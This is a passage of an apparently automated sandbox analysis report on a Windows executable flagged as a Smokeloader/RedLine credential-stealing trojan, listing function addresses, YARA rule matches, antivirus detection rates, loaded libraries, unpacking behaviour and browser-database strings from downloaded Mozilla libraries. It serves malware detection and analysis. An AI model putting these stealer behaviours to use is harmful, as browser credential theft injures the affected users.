                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFFE6800_2_6CFFE680
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CF9C6700_2_6CF9C670
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFB9E500_2_6CFB9E50
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFD3E500_2_6CFD3E50
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFE2E4E0_2_6CFE2E4E
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFB46400_2_6CFB4640
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFF9E300_2_6CFF9E30
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFD7E100_2_6CFD7E10
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFE56000_2_6CFE5600
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFC6FF00_2_6CFC6FF0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CF9DFE00_2_6CF9DFE0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFE77A00_2_6CFE77A0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D006E630_2_6D006E63
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0076E30_2_6D0076E3
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFD77100_2_6CFD7710
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFA9F000_2_6CFA9F00
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFBC0E00_2_6CFBC0E0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFD58E00_2_6CFD58E0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFC60A00_2_6CFC60A0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D00B1700_2_6D00B170
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFDF0700_2_6CFDF070
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFB88500_2_6CFB8850
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFBD8500_2_6CFBD850
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFDB8200_2_6CFDB820
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFE48200_2_6CFE4820
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFA78100_2_6CFA7810
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFCD9B00_2_6CFCD9B0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CF9C9A00_2_6CF9C9A0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFD51900_2_6CFD5190
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFF29900_2_6CFF2990
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFEB9700_2_6CFEB970
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFAD9600_2_6CFAD960
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFBA9400_2_6CFBA940
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0050C70_2_6D0050C7
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFB1AF00_2_6CFB1AF0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFDE2F00_2_6CFDE2F0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFD8AC00_2_6CFD8AC0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFACAB00_2_6CFACAB0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CF922A00_2_6CF922A0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFC4AA00_2_6CFC4AA0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFD9A600_2_6CFD9A60
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0053C80_2_6D0053C8
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CF9F3800_2_6CF9F380
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFAC3700_2_6CFAC370
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D00BA900_2_6D00BA90
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D002AB00_2_6D002AB0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CF953400_2_6CF95340
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFDD3200_2_6CFDD320
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D1C8D200_2_6D1C8D20
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D16AD500_2_6D16AD50
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D10ED700_2_6D10ED70
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0D6D900_2_6D0D6D90
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D044DB00_2_6D044DB0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D1CCDC00_2_6D1CCDC0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D106C000_2_6D106C00
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D11AC300_2_6D11AC30
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D04AC600_2_6D04AC60
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D03ECC00_2_6D03ECC0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D09ECD00_2_6D09ECD0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D046F100_2_6D046F10
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D180F200_2_6D180F20
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0AEF400_2_6D0AEF40
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D102F700_2_6D102F70
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D188FB00_2_6D188FB0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D04EFB00_2_6D04EFB0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D11EFF00_2_6D11EFF0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D040FE00_2_6D040FE0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D120E200_2_6D120E20
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0DEE700_2_6D0DEE70
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0C6E900_2_6D0C6E90
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D04AEC00_2_6D04AEC0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0E0EC00_2_6D0E0EC0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0969000_2_6D096900
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0789600_2_6D078960
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D1009B00_2_6D1009B0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0D09A00_2_6D0D09A0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0FA9A00_2_6D0FA9A0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D15C9E00_2_6D15C9E0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0749F00_2_6D0749F0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0908200_2_6D090820
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0CA8200_2_6D0CA820
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D1148400_2_6D114840
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D1468E00_2_6D1468E0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0E0BA00_2_6D0E0BA0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D146BE00_2_6D146BE0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0EEA000_2_6D0EEA00
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0F8A300_2_6D0F8A30
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0BCA700_2_6D0BCA70
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0BEA800_2_6D0BEA80
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: String function: 6CFCCBE8 appears 134 times
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: String function: 6CFD94D0 appears 90 times
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: String function: 004043B0 appears 316 times
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: String function: 6D1C09D0 appears 112 times
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2903883210.000000006D215000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs pYJeC4VJbw.exe
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs pYJeC4VJbw.exe
                  Source: pYJeC4VJbw.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000000.00000002.2884642591.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000002.2884797147.0000000002D97000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000002.2884177155.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000002.2884841467.0000000002DC0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/29@1/1
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6CFF7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,0_2_6CFF7030
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_00414DE0 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00414DE0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to behavior
                  Source: pYJeC4VJbw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2903802204.000000006D1CF000.00000002.00000001.01000000.00000007.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2895334222.000000001D511000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2903359635.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2903802204.000000006D1CF000.00000002.00000001.01000000.00000007.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2895334222.000000001D511000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2903359635.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2903802204.000000006D1CF000.00000002.00000001.01000000.00000007.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2895334222.000000001D511000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2903359635.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2903802204.000000006D1CF000.00000002.00000001.01000000.00000007.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2895334222.000000001D511000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2903359635.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                  Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                  Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                  Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                  Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                  Source: pYJeC4VJbw.exe, pYJeC4VJbw.exe, 00000000.00000002.2903802204.000000006D1CF000.00000002.00000001.01000000.00000007.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2895334222.000000001D511000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2903359635.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2903802204.000000006D1CF000.00000002.00000001.01000000.00000007.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2895334222.000000001D511000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2903359635.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895334222.000000001D511000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2903359635.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                  Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                  Source: pYJeC4VJbw.exe, 00000000.00000003.2585700635.0000000023494000.00000004.00000020.00020000.00000000.sdmp, JDBFIIEBGCAKKEBFBAAF.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895334222.000000001D511000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2903359635.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                  Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895334222.000000001D511000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2903359635.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                  Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                  Source: pYJeC4VJbw.exeReversingLabs: Detection: 65%
                  Source: pYJeC4VJbw.exeVirustotal: Detection: 46%
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: mozglue.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: Binary string: mozglue.pdbP source: pYJeC4VJbw.exe, 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                  Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                  Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                  Source: Binary string: nss3.pdb@ source: pYJeC4VJbw.exe, 00000000.00000002.2903802204.000000006D1CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
                  Source: Binary string: nss3.pdb source: pYJeC4VJbw.exe, 00000000.00000002.2903802204.000000006D1CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                  Source: Binary string: mozglue.pdb source: pYJeC4VJbw.exe, 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeUnpacked PE file: 0.2.pYJeC4VJbw.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeUnpacked PE file: 0.2.pYJeC4VJbw.exe.400000.0.unpack
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00416240
                  Source: softokn3.dll.0.drStatic PE information: section name: .00cfg
                  Source: softokn3[1].dll.0.drStatic PE information: section name: .00cfg
                  Source: freebl3.dll.0.drStatic PE information: section name: .00cfg
                  Source: freebl3[1].dll.0.drStatic PE information: section name: .00cfg
                  Source: mozglue.dll.0.drStatic PE information: section name: .00cfg
                  Source: mozglue[1].dll.0.drStatic PE information: section name: .00cfg
                  Source: msvcp140.dll.0.drStatic PE information: section name: .didat
                  Source: msvcp140[1].dll.0.drStatic PE information: section name: .didat
                  Source: nss3.dll.0.drStatic PE information: section name: .00cfg
                  Source: nss3[1].dll.0.drStatic PE information: section name: .00cfg
